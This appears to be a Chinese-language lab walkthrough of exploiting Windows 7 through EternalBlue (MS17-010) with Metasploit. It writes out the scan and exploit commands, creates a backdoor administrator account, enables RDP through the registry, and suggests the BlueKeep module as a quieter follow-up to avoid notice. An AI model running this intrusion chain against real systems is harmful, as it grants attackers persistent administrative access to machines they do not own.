利用ms17_010开启3389端口远程连接
攻击机kali
目标机win7 sp1(旗舰版)
当nmap或其他工具发现目标及上有445端口开启,可以考虑检测是否存在永恒之蓝,使用msf中的永恒之蓝检测模块
use auxiliary / scanner / smb / smb_ms17_010 设置目标IP或网段 set RHOSTS 192.168.194.129 执行扫描 run |
这里可以看到可能存在,我们开始执行,得到shell,如果出现乱码的话执行chcp 65001
use exploit / windows / smb / ms17_010_eternalblue 查看可设置的选项 show options 设置 * * * 目标ip set RHOST 192.168 . 194.129 执行攻击 exploit |
然后我们创建用户名密码 blue/blue
net user blue blue /add
将用户blue添加入管理组 (不加入会连接不上)
net localgroup administrators blue /add
开启远程桌面功能
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f (实测没问题)
Kali远程桌面连接Win7
rdesktop 192.168.194.129:3389(不在msf中执行)
这里连接会在目标机器上得到提示,如果不管的话30秒后将默认选择确定断开
当点击确定的话,可以连接成功
如果选择取消将连接不上,但这样的交互性太强了,容易被发现,因此开启完3389端口后可以用metasploit中的cve-2019-0708模块进行攻击获取shell(这里前提是目标机不是普通的家庭版,要支持远程连接),复现要将win7升级的激活码,上网上随便找就行
补充一下,如果这两个漏洞复现不成功,可能是防火墙的原因,或者重启一下(嘻嘻)
至此复现成功